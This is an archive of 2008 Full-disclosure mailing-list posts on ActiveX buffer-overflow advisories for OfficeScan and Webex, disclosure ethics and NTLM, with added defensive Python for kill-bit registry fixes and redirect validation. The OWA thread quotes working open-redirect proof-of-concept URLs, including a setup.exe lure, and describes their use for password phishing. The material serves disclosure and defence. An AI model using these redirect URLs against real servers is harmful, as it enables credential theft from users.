06/27/2008 -> Vulnerability discovered and reported to iDefense
07/02/2008 <- Request for further information
07/16/2008 <- iDefense states that patches exist which resolve this
issue
07/16/2008 -> Request clarification regarding which patches resolve
this issue. No response
07/20/2008 -> Follow up regarding patches. No response
07/28/2008 - Disclosure
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkiN/hsACgkQi04xwClgpZiTrQP+M9MX2MgvLk+HaMgmYghBRQaTG89M
bb0RywlP2UY6/P9qIk0W3AfI1UsVZUPcTduvo+/BKIR7s5M/m+VTa74lEMH5FHQ17QZ6
tAAKI/TYGl7YWG/+4Zj7n8hpjIhT7AahtjbASTwUxSv3pFet/9DMM9nrCXolR0+bsajy
nJzOnmg=
=kQK+
-END PGP SIGNATURE-

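
The workaround above is the kill bit from KB240797: a "Compatibility Flags" DWORD with 0x400 set under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}. The following is an added example written for this page, not code from the advisory or from Trend Micro: it generates the .reg fragment for the objRemoveCtrl CLSID given above and audits an exported ActiveX Compatibility key to confirm the bit is actually set on a client. The sample export is constructed and does not come from a real machine.

```python
import re

KILLBIT = 0x00000400   # Compatibility Flags bit that kill-bits a control (KB240797)
ACTIVEX_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
CLSID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

# CLSID named in the advisory above.
OBJREMOVECTRL_CLSID = "{5EFE8CB1-D095-11D1-88FC-0080C859833B}"


def killbit_reg(clsid):
    """Text of a .reg file that sets the kill bit for one CLSID."""
    if not CLSID_RE.match(clsid):
        raise ValueError("not a CLSID: %r" % clsid)
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[%s\\%s]\r\n"
            "\"Compatibility Flags\"=dword:%08x\r\n" % (ACTIVEX_KEY, clsid.upper(), KILLBIT))


def parse_reg_flags(reg_text):
    """Return {CLSID: Compatibility Flags} from an exported ActiveX Compatibility key,
    ignoring values that sit under unrelated keys."""
    flags = {}
    current = None
    prefix = ACTIVEX_KEY.lower() + "\\"
    for line in reg_text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            key = m.group(1)
            current = key.rsplit("\\", 1)[-1] if key.lower().startswith(prefix) else None
            continue
        m = re.match(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$', line)
        if m and current:
            flags[current.upper()] = int(m.group(1), 16)
    return flags


def is_killbitted(reg_text, clsid):
    """True if the export shows the kill bit set for clsid (other flag bits may be present)."""
    return bool(parse_reg_flags(reg_text).get(clsid.upper(), 0) & KILLBIT)


# Constructed export: one control kill-bitted, one not, and a same-named value
# under an unrelated key that must be ignored.
SAMPLE_EXPORT = "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    "[" + ACTIVEX_KEY + "\\{00000000-0000-0000-0000-000000000001}]",
    '"Compatibility Flags"=dword:00000400',
    "",
    "[" + ACTIVEX_KEY + "\\{00000000-0000-0000-0000-000000000002}]",
    '"Compatibility Flags"=dword:00000000',
    "",
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]",
    '"Compatibility Flags"=dword:00000400',
    "",
])


if __name__ == "__main__":
    print(killbit_reg(OBJREMOVECTRL_CLSID))
    print("objRemoveCtrl kill-bitted in sample export:",
          is_killbitted(SAMPLE_EXPORT, OBJREMOVECTRL_CLSID))
```

The check uses a bitwise AND because the value may carry other compatibility flags alongside 0x400. Apply the generated fragment with reg import or through Group Policy; since the kill bit lives under HKLM it applies to every user on the machine, and it will also stop the control loading in the OfficeScan web console itself, so test on one client before deploying broadly.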


Re: [Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-29 Thread Elazar Broad


On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad 
<[EMAIL PROTECTED]> wrote:

Another possible fix for this is to copy the RemoveCtrl.cab from 8.0 (you can download it from here: http://www.trendmicro.com/download/product.asp?productid=5; as stated above, 8.x is not vulnerable since the control uses *_s functions as opposed to the standard C functions). The 8.0 critical patch B1242 has a copy of this CAB, so you don't need to download the entire 8.0 package. Replace the one located in the ClientInstall folder on the OfficeScan server. I have not tested to see if this breaks web deployment or not.



[Full-disclosure] Webex atucfobj Module ActiveX Control Buffer Overflow Vulnerability

2008-08-06 Thread Elazar Broad

Who:
Webex
http://www.webex.com/

What:
Webex Meeting Manager
http://support.webex.com/support/downloads.html

How:
The Webex Meeting Manager utilizes several ActiveX controls, one of which is vulnerable to a stack-based buffer overflow. The atucfobj Module contains a single method called NewObject() whose only parameter is vulnerable to this issue.

This issue has been confirmed in version 20.2008.2601.4928; prior versions are believed to be vulnerable as well.

atucfobj.dll version 20.2008.2601.4928
{32E26FD9-F435-4A20-A561-35D4B987CFDC}

Fix:
The vendor has released version 20.2008.2606.4919 of this control,
which fixes this issue. The control should be updated when the user
joins a meeting.

Workaround:
Set the killbit for the affected control. See
http://support.microsoft.com/kb/240797

Credit:
When I reported this issue to the vendor, they had stated that they
were aware of it, but would not say whether it was the result of an
internal audit or an independent researcher.

Timeline:
06/20/2008 -> Issue reported to the vendor
06/21/2008 <- Vendor responds asking for further details
06/22/2008 -> Details sent with PoC
06/25/2008 <- Vendor responds stating that they are aware of this
issue
08/06/2008 - Disclosure

Elazar

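Both advisories (the OfficeScan control earlier on this page and the Webex control in this post) give the same workaround: set the kill bit per KB240797. The following is an added example, not code from either advisory or vendor. It renders a .reg file for the two CLSIDs quoted on this page and, on Windows, ORs the kill bit into the existing "Compatibility Flags" value; the key path is the ActiveX Compatibility key KB240797 documents and KILL_BIT is its 0x400 flag.

```python
"""Kill-bit helper for the two ActiveX controls named in the advisories above.

Added example, not code from either advisory or vendor. It implements the
workaround both posts point at (KB240797): setting bit 0x400 in the
"Compatibility Flags" value under the ActiveX Compatibility key so that
Internet Explorer refuses to instantiate the control.
"""
import re
import sys

# CLSIDs exactly as quoted in the two advisories on this page.
OFFICESCAN_REMOVECTRL = "{5EFE8CB1-D095-11D1-88FC-0080C859833B}"
WEBEX_ATUCFOBJ = "{32E26FD9-F435-4A20-A561-35D4B987CFDC}"

KILL_BIT = 0x400  # COMPAT_EVIL_DONT_LOAD (KB240797)
COMPAT_SUBKEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
# 32-bit IE on 64-bit Windows reads the redirected (Wow6432Node) view of the same key.
COMPAT_SUBKEY_WOW64 = r"SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"

_CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$")


def normalize_clsid(clsid: str) -> str:
    """Return the CLSID upper-cased and braced; reject anything that is not one.

    Validating here keeps a typo or a stray string from creating a junk
    registry key under HKLM.
    """
    c = clsid.strip().upper()
    if not c.startswith("{"):
        c = "{" + c + "}"
    if not _CLSID_RE.match(c):
        raise ValueError(f"not a CLSID: {clsid!r}")
    return c


def kill_bit_set(flags: int) -> bool:
    """True when an existing Compatibility Flags value already carries the kill bit."""
    return bool(flags & KILL_BIT)


def reg_file(clsids, include_wow64: bool = True) -> str:
    """Render a .reg file (for `reg.exe import` or Group Policy preference deployment).

    A .reg import replaces the whole value, so this writes KILL_BIT on its own;
    use apply_kill_bit() when other compatibility flags must survive.
    """
    subkeys = [COMPAT_SUBKEY] + ([COMPAT_SUBKEY_WOW64] if include_wow64 else [])
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in map(normalize_clsid, clsids):
        for sub in subkeys:
            lines.append(f"[HKEY_LOCAL_MACHINE\\{sub}\\{clsid}]")
            lines.append(f'"Compatibility Flags"=dword:{KILL_BIT:08x}')
            lines.append("")
    return "\n".join(lines)


def apply_kill_bit(clsid: str) -> int:
    """On Windows, OR the kill bit into the existing flags in both registry
    views and return the resulting value. Needs an elevated shell (HKLM)."""
    if sys.platform != "win32":
        raise RuntimeError("registry write is only possible on Windows")
    import winreg  # stdlib, Windows only

    clsid = normalize_clsid(clsid)
    new_flags = 0
    # KEY_WOW64_32KEY is ignored on 32-bit Windows, so the loop is safe there too.
    for view in (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY):
        access = winreg.KEY_READ | winreg.KEY_WRITE | view
        with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE,
                                f"{COMPAT_SUBKEY}\\{clsid}", 0, access) as key:
            try:
                current, _ = winreg.QueryValueEx(key, "Compatibility Flags")
            except FileNotFoundError:
                current = 0
            new_flags = current | KILL_BIT
            winreg.SetValueEx(key, "Compatibility Flags", 0,
                              winreg.REG_DWORD, new_flags)
    return new_flags


if __name__ == "__main__":
    # Print a .reg file covering both controls; redirect the output to killbits.reg.
    print(reg_file([OFFICESCAN_REMOVECTRL, WEBEX_ATUCFOBJ]))
```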


Re: [Full-disclosure] To disclose or not to disclose

2008-09-27 Thread Elazar Broad

I would opt for #1; additionally, contacting CERT and other quasi-government security organizations would be a plus, they might have better luck lighting a fire under the theoretical vendor's ass...

elazar

On Sat, 27 Sep 2008 03:39:34 + Simon Smith <[EMAIL PROTECTED]>
wrote:
>Greetings,
>   I have a theoretical question of ethics for other security professionals that participate in this list. This is not an actual situation, but it is a potentially realistic situation that I'm interested in exploring and finding an acceptable solution to.
>
>   Suppose a penetration testing company delivers a service to a customer. That customer uses a technology that was created by a third party to host a critical component of their infrastructure. The penetration testing company identifies several critical flaws in the technology and notifies the customer, and the vendor.
>
>   One year passes and the vendor had done nothing to fix the issue. The customer is still vulnerable and they have done nothing to change their level of risk and exposure. In fact, let's say that the vendor flat out refuses to do anything about the issue even though they have been notified of the problem. Let's also assume that this issue affects thousands of customers in the financial and medical industry and puts them at dire risk.
>
>   What should the security company do?
>
>1-) Create a formal advisory, contact the vendor and notify them of the intent to release the advisory in a period of "n" days? If the vendor refuses to fix the issue does the security company still release the advisory in "n" days? Is that protecting the customer or putting the customer at risk? Or does it even change the risk level as their risk still exists.
>
>2-) Does the security company collect a list of users of the technology and notify those users one by one? The process might be very time consuming but by doing that the security company might not increase the risk faced by the users of the technology, will they?
>
>3-) Does the security company release a low level advisory that notifies users of the technology to contact the vendor in order to gain access to the technical details about the issue?
>
>4-) Does the security company do something else? If so, what is the appropriate course of action?
>
>5-) Does the security company do nothing?
>
>I'm very interested to hear what people think the "responsible" action would be here. It appears that this is a challenge that will at some level create risk for the customer. Is it impossible to do this without creating an unacceptable level of risk?
>
>Looking forward to real responses (and troll responses too... especially n3td3v).
>
>--
>
>- simon
>
>--
>http://www.snosoft.com
>


Re: [Full-disclosure] To disclose or not to disclose

2008-09-28 Thread Elazar Broad

Simon,
 If the issue really involves critical infrastructure you can expect (to an extent) many government and quasi-government organizations to step in and pressure the vendor to fix the issue before you go public. A real world example: at a recent conference, I was talking to a security executive of a rather large utility and the recently disclosed Citect issue came up. He mentioned that he was at a certain government organization's lab while they were assessing the issue based on the information they received from CORE. If you read CORE's disclosure timeline, the real fire hadn't been lit until this organization, along with some others, stepped in and really got under the vendor's skin. He also mentioned how clueless Citect's initial response was, but that's another story. Given the general awareness of these organizations of the fact that critical infrastructure vulnerabilities = potentially major problems, I think setting a deadline (which will probably be extended at the behest of these organizations) for the vendor is not a bad idea, and the chances of the issue getting fixed before you spill the beans are pretty high. You can't forget the "somewhat" obvious as well: if you found it, someone else can find it too. As far as the vendor is concerned, well, we all know what happened to a certain electronic voting machine vendor... Look, I'm no expert, this is just my .02...

elazar

On Sun, 28 Sep 2008 03:01:08 + Simon Smith <[EMAIL PROTECTED]>
wrote:
>Elazar,
>   I suppose that could be a good action, but doing that would potentially put the security company's customer at risk. Granted, in the argument they were already notified of the risk. So the question is, is that the ethical choice? Is that a good business choice?

Re: [Full-disclosure] security industry software license

2008-10-15 Thread Elazar Broad
So take it up with him like a man and not on our inboxes...

On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]> 
wrote:
>On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr. 
><[EMAIL PROTECTED]> wrote:
>> And by the way, why insistently and specifically targeting 
>Metasploit?
>
>i don't like hd moore
>


Re: [Full-disclosure] Securing our computers?

2008-11-03 Thread Elazar Broad

What's your poison of choice?

On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>I already have a drinking game going, awarding myself a drink for every time n3td3v says something stupid, and every time I play it I run out of booze or black out... Dangerous stuff... If you are in my area we can play it together sometime...
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <[EMAIL PROTECTED]> wrote:
>> Actually I think a new game should be created that revolves around stalking n3td3v. Points would be awarded for the quickest response to each of his worthless posts. At the end of the month a Stalker of the Month could be selected and given a prize. Bonus points could be given out for the most degrading responses. I think it could be a lot of fun.
>>
>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <[EMAIL PROTECTED]> wrote:
>>>
>>> Jesus ... you guys need to get back on your lithium...
>--
>http://michaelboman.org - Security Blog & Wiki
>


Re: [Full-disclosure] Securing our computers?

2008-11-04 Thread Elazar Broad

Beer, dry wine, single malts and the occasional shot of good Polish
potato vodka...

On Tue, 04 Nov 2008 00:17:17 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>Beer and Whiskey, unless you have a good Russian vodka - the Swedish ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>--
>http://michaelboman.org - Security Blog & Wiki


Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday

2008-11-06 Thread Elazar Broad

What scene...

On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no experience? i make that about 10 years experience if my math is correct.
>
>On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <[EMAIL PROTECTED]> wrote:
>> Do you even understand why people don't like you? It is because you have all these crackpot ideas but no experience to back it up. All your ideas only make sense from a theoretical standpoint, but in practicality most will fail.
>>
>> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <[EMAIL PROTECTED]> wrote:
>>>
>>> blackhats like you will always hate on me, so i just ignore the negative responses i get.
>>
>


Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

2008-11-15 Thread Elazar Broad

A quick test of OWA 2007 shows that it is not vulnerable...

On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham
<[EMAIL PROTECTED]> wrote:
>I found and reported this back in 2005/2006. Microsoft told me that it had been reported previously and that it would be fixed in the next release, which I'm guessing they meant 2007. I do not know if they have fixed it in Exchange 2007.
>
>On Sat, Nov 15, 2008 at 5:33 AM, Piergiorgio Venuti <[EMAIL PROTECTED]> wrote:
>> Hi all,
>> also I've found this vulnerability 1 year ago during a pt and it works fine with url obfuscation. I've read that with owa 2007 this vulnerability is patched but I haven't tried yet.
>>
>> Best regards,
>> Piergiorgio
>>
>>
>> Giuseppe Gottardi wrote:
>>> Davide, let me comfort you...
>>>
>>> I found this vulnerability 1 year ago during a penetration test activity and I never reported it before, out of negligence :-)
>>>
>>> https://owa/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.google.it&reason=0
>>>
>>> Best regards,
>>> oveRet
>>>
>>>
>>> On Fri, 2008-10-17 at 21:07 +0200, Davide Del Vecchio wrote:
>>>> Hi,
>>>>
>>>> I found and notified this vulnerability to Microsoft in date:
>>>>
>>>> Tue, 10 Apr 2007 15:40:13 +0200
>>>>
>>>> You read exactly, April 2007, 1 year and 6 months ago. :(
>>>>
>>>> The Microsoft Security Response Center opened the case ID MSRC 7368br.
>>>>
>>>> The bug has never been patched since 1 year and 6 months.
>>>> I asked time to time for updates but they always answered me that the bug had to be patched with the next Service Pack and they did not have any ETA.
>>>>
>>>> This SP has still to be released.
>>>>
>>>> They told me that if I released the vulnerability prior to the official patch, I could not be officially credited for that. I thought it was not a critical vuln, and so I waited. Too much (?).
>>>>
>>>> I am a bit sorry for Microsoft, I think they lost another chance since now I feel a bit tricked. I am not sure if the next time I will wait so much and I am not sure if I will suggest to anyone to wait for the patch. I just hope Microsoft will credit me in the official patch. :(
>>>>
>>>> Below you can find the first mail I wrote to MS regarding the issue.
>>>>
>>>> Best regards,
>>>>
>>>> Davide Del Vecchio.
>>>>
>>>>
>>>> From: "Davide Del Vecchio" <[EMAIL PROTECTED]>
>>>> To: [EMAIL PROTECTED]
>>>>
>>>> Subject: Microsoft Outlook Web Access "redir.asp" Redirection Weakness
>>>> Date: Tue, 10 Apr 2007 15:40:13 +0200
>>>>
>>>> Hello,
>>>>
>>>> I found a weakness in Microsoft Outlook Web Access (OWA), which potentially can be exploited by malicious people to conduct phishing attacks.
>>>> The weakness is caused due to a design error in the way OWA uses an unverified user supplied argument to redirect a user after successful authentication.
>>>> This can e.g. be exploited by tricking a user into following a link from a HTML document to the trusted login page with a malicious "url" parameter. After successful authentication, the user will be redirected to the untrusted (fake) site.
>>>>
>>>> The affected product is:
>>>> Microsoft Outlook Web Access ( OWA )
>>>> Windows 2003
>>>>
>>>> Examples:
>>>> https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com
>>>>
>>>> this will take the user to http://www.example.com when the login box is pressed.
>>>>
>>>> https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe
>>>> prompts the user to download an executable or other file.
>>>>
>>>> The attacker can then have a page to capture the user / password and redirect back to the original login page or some other form of phishing attack.
>>>>
>>>> Note that this vulnerability is very similar to the one affecting "owalogin.asp" described here:
>>>> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420
>>>>
>>>> Best regards,
>>>>
>>>> Davide Del Vecchio.
>>>>
>>>> Martin Suess wrote:
>>>>
>>>> ...
>>>>
>>>>
>>>>> Timeline:
>>>>> -
>>>>> Vendor Status:    MSRC tracking case closed
>>>>> Vendor Notified:  March 31st 2008
>>>>> Vendor Response:  May 6th 2008
>>>>> Advisory Release: October 15th 2008
>>>>> Patch available:  - (vulnerability not high priority)
>>>>>
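Davide's message describes the root cause: redir.asp (and the CookieAuth.dll GetLogon url= parameter that Giuseppe's URL chains into it) redirects to an unverified, user-supplied target. As an added example, not Microsoft code, here is the allow-list check a defender would put in front of such a redirector, run against the URLs quoted in the thread; the host name owa.corp.example is a hypothetical placeholder.

```python
"""Redirect-target validation for the OWA 2003 "redir.asp" / "GetLogon?url="
weakness discussed in this thread.

Added example, not Microsoft code. It shows the check the thread says OWA
lacked: accept only targets that stay on the OWA host, and follow a target
that is itself one of OWA's own redirectors (the CookieAuth.dll -> redir.asp
chain quoted above) so an external URL cannot hide one level down.
"""
from urllib.parse import parse_qs, urlsplit

OWA_HOST = "owa.corp.example"  # hypothetical OWA host name, not from the thread
REDIRECTORS = ("/exchweb/bin/redir.asp", "/cookieauth.dll")  # paths quoted in the thread
MAX_DEPTH = 3                  # stop redirector-in-redirector loops


def embedded_targets(path: str, query: str) -> list:
    """Return every redirect target carried by one of OWA's own redirector URLs.

    redir.asp takes ?URL=..., CookieAuth.dll takes ?GetLogon?url=...; every
    occurrence of the parameter is returned so parameter pollution cannot
    slip a second value past the check.
    """
    if path.lower() not in REDIRECTORS:
        return []
    if query.lower().startswith("getlogon?"):
        query = query.split("?", 1)[1]
    found = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() == "url":
            found.extend(values)
    return found


def is_safe_redirect(target: str, owa_host: str = OWA_HOST, depth: int = 0) -> bool:
    """True only if following `target` keeps the user on `owa_host`."""
    if depth > MAX_DEPTH or not target:
        return False
    # Backslashes and control characters are normalised differently by
    # browsers and servers; refuse rather than guess what they resolve to.
    if "\\" in target or any(ord(ch) < 0x20 for ch in target):
        return False
    parts = urlsplit(target)
    if parts.scheme:
        # Absolute URL: only http(s) back to our own host is acceptable.
        if parts.scheme not in ("http", "https"):
            return False
        if parts.hostname is None or parts.hostname != owa_host.lower():
            return False
    elif parts.netloc:
        return False  # scheme-relative "//other.host/..." leaves the site
    elif not parts.path.startswith("/"):
        return False  # require a site-absolute path
    # A safe-looking local path may itself be a redirector carrying the real target.
    inner = embedded_targets(parts.path, parts.query)
    return all(is_safe_redirect(t, owa_host, depth + 1) for t in inner)


# Constructed sample: the URLs quoted in the thread (as site-relative paths),
# plus the cases a reviewer would add, each with the verdict the check should reach.
SAMPLES = [
    ("/exchweb/bin/redir.asp?URL=http://www.example.com", False),
    ("/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe", False),
    ("/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3D"
     "http%3A%2F%2Fwww.google.it&reason=0", False),
    ("/CookieAuth.dll?GetLogon?url=%2Fexchange%2F&reason=0", True),
    ("/exchange/inbox", True),
    ("https://owa.corp.example/exchange/", True),
    ("//www.example.com/", False),
    ("https://owa.corp.example@www.example.com/", False),
]


def check_samples() -> dict:
    """Run every sample through the check; returns {target: verdict}."""
    return {t: is_safe_redirect(t) for t, _ in SAMPLES}


if __name__ == "__main__":
    for target, expected in SAMPLES:
        verdict = is_safe_redirect(target)
        print(f"{'ok ' if verdict == expected else 'BAD'} {str(verdict):5} {target}")
```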

Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-23 Thread Elazar Broad

Symantec's Endpoint Protection has a device control feature which
basically functions as you have stated. I haven't really played
around with it much, however, it can block devices based on device
id...

elazar

On Mon, 24 Nov 2008 00:17:34 -0500 Bipin Gautam
<[EMAIL PROTECTED]> wrote:
>On 11/24/08, James Matthews <[EMAIL PROTECTED]> wrote:
>> bit9 and kaspersky offer this new service. Companies should make use of it.
>>
>
>what service, James!
>
>Could you please explain more...
>
>I find it ridiculous to know that this problem has been there since the earliest version of windows but still without a generic solution! Is this unwillingness for the approach to a proper solution what has fueled the "antivirus business" for so long?
>
>If you look in the *nix side you will see this technique is tested/proven. Signature based or behavior based approach detection will continue to fail.
>
>To address this never-ending problem of virus infection from removable media, I have implemented no-execution-from-removable to dozens of computers in the past years, even the dumbest of users understand what is being done and feel safe that they won't likely have virus infection from the removable media ever, even if the media has a virus. They know the workaround on how to temporarily disable the restriction if they are willing to run something trustworthy as I have made the users clear there is no solution to the problem of virus infection from removable media and you have to learn these few things ...like you have learned to use antivirus software to stay safe. Users get it, really!
>
>Antivirus companies should take a similar approach (as described previously) to address it but adding USABILITY.
>
>This problem is there to stay for years to come. What better could be the proper solution to this problem?
>
>thanks,
>-bipin
>
>
>
>> On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam <[EMAIL PROTECTED]> wrote:
>>
>>> On 11/23/08, Mike C <[EMAIL PROTECTED]> wrote:
>>>
>>> >> Of course, blindly thwacking people / dragging them to HR by the hair when they're really just trying to do their jobs is counter-productive. The calls also show us where we, security, are falling down. Perhaps it's poor awareness training (if the user didn't know that they shouldn't run unapproved software, or why we have that rule, or how to get a new app approved); or could be that the official route is being seen as too slow or bureaucratic, in which case it needs fixing. And so on.
>>> >>
>>> >
>>> > All I hope is we can fix the issue. Hopefully in the near future.
>>> >
>>>
>>>
>>> Yeah!
>>> Here is my perspective on a possible solution that wouldn't compromise usability.
>>>
>>> But, first let's all agree on "banning execution of any binary from removable media" is the only straightforward solution to this decades old problem of virus infection/propagation from removable media.
>>>
>>> See, if a web-page tries to install an activeX / browser plugin, your browser (non intrusively) waits for user interaction with a security warning message on "if you really intend to install the plugin (Which may be harmful!)" or ...may choose to ignore the dialog and continue browsing.
>>>
>>> Here, it is assumed "user understands" the security impact of executing untrusted programs from internet and the execution decision is left to the end user with manual interaction. If the plugin installation behavior is not intended user can simply ignore the manual interaction request for execution and instead continue.
>>>
>>> In similar way, anti virus company or Microsoft should create similar for "My Computer Zone" where the first execution of a binary "from removable media" is denied by default and prompt for user interaction to execute, white list&execute or terminate/ban the request for execution from removable media like the way internet explorer (non intrusively) handles installation of activeX like in IE. Binary execution from removable media should be treated that way ( untrusted ! )
>>>
>>> Pen drive / SD have unique serial numbers which can be used to identify and permanently whitelist or blacklist the media from execution.
>>>
>>> Windows already has a feature for prompting if user tries to execute binary from intranet/shared folder or execution of binary marked as downloaded from "Internet Zone"
>>>
>>> Why not have similar for binary execution from removable media as well!?
>>>
>>> What better could be the solution to stopping virus to propagate from removable medias with (default) FAT file system. (lacking ACL's)
>>>
>>> For corporate environment let there be feature to sync these white listed/blacklisted hashes of executable or removable media UID from anti virus server/domain controller to anti virus clients/r

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-26 Thread Elazar Broad

Um, NTLM isn't the only 20 or so year old protocol to take the rap recently; I can think of a low numbered RFC, let's say 1034 and 1035. Hindsight is 20/20, and 20 years ago, who would have thought that a 16 bit number was way too small for a DNS transaction id? The same "who would have thought" goes for NTLM and the rest. Let's face it, protocol design bugs suck, and to completely replace a widely used protocol ranks pretty high in the PiTA hall of fame...

On Tue, 25 Nov 2008 05:25:57 -0500 Eric Rachner <[EMAIL PROTECTED]>
wrote:
>Hey, kid -
>
>If you've got any better ideas about how to fix NTLM, the industry
>is ready & waiting to hear them.
>
>The fact is, NTLM is an old & busted protocol that happens to be
>used *everywhere*, and there's no way to fix it without breaking
>compatibility with, oh, just the entire installed base.  I was happy
>to see MS08-068 because the technique it implements is better than
>nothing - it offers a nice, clever way to reduce the exploitability
>of the issue without breaking anything important.
>
>Don't bother telling us all how M$ should just bite the
>incompatibility bullet and turn NTLM off - that's been an option for
>users, theoretically speaking, since about the time Windows Kerberos
>support became mature, and practically speaking, nobody seems to be
>turning NTLM off here in the real world.
>
>- Eric
>
>On Tue, Nov 25, 2008 at 7:44 AM, Memisyazici, Aras <[EMAIL PROTECTED]>
>wrote:
>
>> > http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-smbrelay.aspx
>> >
>>
>> What we released today with MS08-068 is that security update. It
>> addresses the SMBRelay issue (discovered in 2001) and does so in a
>> way that doesn't have the negative impact on applications that we
>> originally believed addressing this issue would have.
>>
>> So... Hmm... I wonder what would happen if the rest of the world
>> followed suit with M$' approach, and took 7 years to "fix" an issue
>> in order to "not cause a significant impact"...
>>
>> Scenario:
>>
>> Ppl: Hey Ford, if one brute-forces the keyless entry on the door,
>> your car explodes...
>>
>> Ford: well... I'll offer you three choices, two immediately, and the
>> last one 7 yrs later. You can either not use the keyless entry system
>> (we'll give you some shiny duct tape to cover it) or you can use the
>> biometric-knub system which requires that you have a knub... So those
>> who have arms & legs can't use the system... (btw this will give
>> birth to a whole new industry that will allow ppl to pay money for a
>> product that fakes a knub for people with appendages) But it's
>> biometric & cool this way! Or you can wait for 7 years and we'll
>> release a non-exploding version of the keyless-entry system.
>>
>> ***
>>
>> OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who
>> is interpreting this, this way? Really? When has releasing a solution
>> to a problem 7 years later ever been acceptable?
>>
>> Jus' sayin' ...
>>
>> Aras 'Russ' Memisyazici
>> Systems Administrator
>> Virginia Tech
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>


Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-28 Thread Elazar Broad

Dan has been an exception to just about every rule, including the
"you should take me seriously" rule. Not that this is a good thing;
the guy is brilliant...

On Wed, 26 Nov 2008 14:40:42 -0500 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On November 26, 2008 1:59:27 AM -0600 Elazar Broad
><[EMAIL PROTECTED]> wrote:
>
>> Um, NTLM isn't the only 20 or so year old protocol to take the rap
>> recently; I can think of a low-numbered RFC, let's say 1034 and
>> 1035. Hindsight is 20/20, and 20 years ago, who would have thought
>> that a 16-bit number was way too small for a DNS transaction ID? The
>> same "who would have thought" goes for NTLM and the rest. Let's face
>> it, protocol design bugs suck, and completely replacing a widely
>> used protocol ranks pretty high in the PiTA hall of fame...
>>
>
>In that particular case Dan Bernstein not only *did* think about it
>but actually did something about it.  It's just that no one else was
>listening.
>
>Paul Schmehl, If it isn't already
>obvious, my opinions are my own
>and not those of my employer.
>**
>WARNING: Check the headers before replying


Re: [Full-disclosure] Sonicwall license servers down .. all customers affected

2008-12-02 Thread Elazar Broad

I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.

On Tue, 02 Dec 2008 14:14:43 -0500 IT Security
<[EMAIL PROTECTED]> wrote:
>Sonicwall (makers of various security products) has had their
>license manager (server) go haywire overnight and it's "reset"
>(meaning invalidated) the licenses on all of their email security
>products. This means customers can't log in to their own systems (a
>good case against draconian DRM like this). Calls to support have
>gone straight to voicemail all morning, and no ETA for resolution
>yet exists.
>
>This is affecting **all** of their customers, as far as I can tell
>(and based on what I'm told by their general support ticket-taker).
>
>Their forum (probably requires registration) is full of complaints
>about it. Screenshots of it and other problem areas are available on
>request (but I don't want to email them to this entire list).
>
>The first alert was these warnings:
>
>~~ SonicWALL Email Security Alert (6.2.2.1071) ~~
>
>[Summary: Your Email Security licenses have been reset.]
>
>Details:
>Host Name: **ourmailhost**
>Description: The Email Security licenses have been reset at
>12/02/2008 04:18 EST. The email filtering will not be
>working.
>
>TimeStamp:
>LocalTime: Tue Dec 2 04:18:49 2008
>GMT: Tue Dec 2 09:18:49 2008
>
>Additional Information:
>Recommended Action: Please contact SonicWall Technical
>Support.
>
